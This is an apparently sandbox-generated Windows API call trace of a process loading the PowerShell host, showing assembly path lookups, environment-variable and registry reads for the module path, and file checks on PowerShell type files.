	[0301.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0301.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0301.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0301.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0301.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0301.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0302.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0302.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0302.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0302.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0302.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0302.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0302.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0302.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0302.996] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1d0
	[0302.997] CoCreateGuid (in: pguid=0x1cd9d0 | out: pguid=0x1cd9d0*(Data1=0xb735a326, Data2=0xd3f7, Data3=0x44eb, Data4=([0]=0x89, [1]=0x6b, [2]=0xe3, [3]=0x8e, [4]=0x98, [5]=0xce, [6]=0xbe, [7]=0x77))) returned 0x0
	[0302.999] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0302.999] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0302.999] CoTaskMemFree (pv=0x2a1430) 
	[0303.005] WinSqmIsOptedIn () returned 0x0
	[0303.006] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0303.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.006] CoTaskMemFree (pv=0x2a1430) 
	[0303.007] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0303.007] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.007] CoTaskMemFree (pv=0x2a1430) 
	[0303.008] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0303.008] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.008] CoTaskMemFree (pv=0x2a1430) 
	[0303.008] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0303.008] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.008] CoTaskMemFree (pv=0x2a1430) 
	[0303.009] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0303.009] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.009] CoTaskMemFree (pv=0x2a1430) 
	[0303.009] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0303.010] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.010] CoTaskMemFree (pv=0x2a1430) 
	[0303.010] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0303.010] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.010] CoTaskMemFree (pv=0x2a1430) 
	[0303.010] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0303.010] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.010] CoTaskMemFree (pv=0x2a1430) 
	[0303.012] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0303.012] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.012] CoTaskMemFree (pv=0x2a1430) 
	[0303.014] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0303.014] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.014] CoTaskMemFree (pv=0x2a1430) 
	[0303.015] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0303.015] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.015] CoTaskMemFree (pv=0x2a1430) 
	[0303.015] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0303.015] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.015] CoTaskMemFree (pv=0x2a1430) 
	[0306.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.017] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0307.017] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0307.017] CoTaskMemFree (pv=0x2a1430) 
	[0307.018] CoTaskMemAlloc (cb=0xcc) returned 0x2b4610
	[0307.018] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2b4610, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0307.018] CoTaskMemFree (pv=0x2b4610) 
	[0307.018] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd548 | out: phkResult=0x1cd548*=0x328) returned 0x0
	[0307.018] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd4cc, lpData=0x0, lpcbData=0x1cd4c8*=0x0 | out: lpType=0x1cd4cc*=0x2, lpData=0x0, lpcbData=0x1cd4c8*=0x6c) returned 0x0
	[0307.018] CoTaskMemAlloc (cb=0x70) returned 0x2a5220
	[0307.018] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd49c, lpData=0x2a5220, lpcbData=0x1cd498*=0x6c | out: lpType=0x1cd49c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1cd498*=0x6c) returned 0x0
	[0307.018] CoTaskMemFree (pv=0x2a5220) 
	[0307.018] CoTaskMemAlloc (cb=0xcc) returned 0x2b4610
	[0307.018] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x2b4610, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0307.018] CoTaskMemFree (pv=0x2b4610) 
	[0307.018] CoTaskMemAlloc (cb=0xcc) returned 0x2b4610
	[0307.019] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2b4610, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0307.019] CoTaskMemFree (pv=0x2b4610) 
	[0307.020] RegCloseKey (hKey=0x328) returned 0x0
	[0307.020] CoTaskMemAlloc (cb=0xcc) returned 0x2b4610
	[0307.021] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2b4610, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0307.021] CoTaskMemFree (pv=0x2b4610) 
	[0307.021] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd548 | out: phkResult=0x1cd548*=0x328) returned 0x0
	[0307.021] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd4cc, lpData=0x0, lpcbData=0x1cd4c8*=0x0 | out: lpType=0x1cd4cc*=0x0, lpData=0x0, lpcbData=0x1cd4c8*=0x0) returned 0x2
	[0307.021] RegCloseKey (hKey=0x328) returned 0x0
	[0307.024] CoTaskMemAlloc (cb=0x20c) returned 0x2ef2b0
	[0307.025] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2ef2b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0307.025] CoTaskMemFree (pv=0x2ef2b0) 
	[0307.025] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0307.026] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0307.035] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0307.035] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.035] CoTaskMemFree (pv=0x2a1430) 
	[0307.036] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0307.036] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.036] CoTaskMemFree (pv=0x2a1430) 
	[0307.038] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0307.038] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.038] CoTaskMemFree (pv=0x2a1430) 
	[0307.038] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0307.038] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.039] CoTaskMemFree (pv=0x2a1430) 
	[0307.040] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd338 | out: phkResult=0x1cd338*=0x330) returned 0x0
	[0307.041] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x1cd34c, lpData=0x0, lpcbData=0x1cd348*=0x0 | out: lpType=0x1cd34c*=0x1, lpData=0x0, lpcbData=0x1cd348*=0x74) returned 0x0
	[0307.042] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x1cd2bc, lpData=0x0, lpcbData=0x1cd2b8*=0x0 | out: lpType=0x1cd2bc*=0x1, lpData=0x0, lpcbData=0x1cd2b8*=0x74) returned 0x0
	[0307.042] CoTaskMemAlloc (cb=0x78) returned 0x2a5220
	[0307.042] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x1cd28c, lpData=0x2a5220, lpcbData=0x1cd288*=0x74 | out: lpType=0x1cd28c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1cd288*=0x74) returned 0x0
	[0307.042] CoTaskMemFree (pv=0x2a5220) 
	[0307.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1cd000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0307.042] SetErrorMode (uMode=0x1) returned 0x1
	[0307.042] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1cd210 | out: lpFileInformation=0x1cd210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0309.978] SetErrorMode (uMode=0x1) returned 0x1
	[0309.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0309.979] SetErrorMode (uMode=0x1) returned 0x1
	[0309.979] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd210 | out: lpFileInformation=0x1cd210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0309.979] SetErrorMode (uMode=0x1) returned 0x1
	[0309.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0309.981] SetErrorMode (uMode=0x1) returned 0x1
	[0309.981] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd210 | out: lpFileInformation=0x1cd210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0309.981] SetErrorMode (uMode=0x1) returned 0x1
	[0309.982] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0309.982] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0309.982] CoTaskMemFree (pv=0x2a1430) 
	[0309.983] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0309.983] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0309.983] CoTaskMemFree (pv=0x2a1430) 
	[0309.984] GetACP () returned 0x4e4
